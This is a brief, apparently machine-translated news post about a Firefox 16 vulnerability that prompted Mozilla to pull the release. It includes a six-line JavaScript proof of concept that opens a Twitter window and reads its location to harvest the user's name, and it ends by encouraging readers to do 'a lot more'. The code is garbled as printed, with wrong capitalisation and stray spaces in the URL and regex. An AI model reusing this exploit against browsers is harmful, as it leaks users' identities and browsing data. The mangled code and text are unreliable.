Firefox released the latest official version of Firefox 16 a few days ago, but a major security vulnerability broke out just one day after it was released. Mozilla then removed the download link of Firefox 16 from the official homepage, in turn, we will continue to provide Firefox 15.0.1.
Mozilla explained: "This vulnerability may allow malicious websites to obtain user access records and steal URL or URL parameters. However, there is no indication that the vulnerability has been exploited ."
The following are attacks that exploit this vulnerability to obtain user information:Code, Very simple, with only 6 lines:
Function POC () {var win = Window. open ('https: // twitter.com/lists/', 'newwin', 'width = 200, Height = 100'); setTimeout (function () {alert ('hello' +/^ https: \/Twitter.com \/([^/] + )/. exec (win. location) [1])}, 5000 );}
This Code demonstrates using the Firefox 16 vulnerability to collect Twitter user names. Of course, you can do a lot more !!!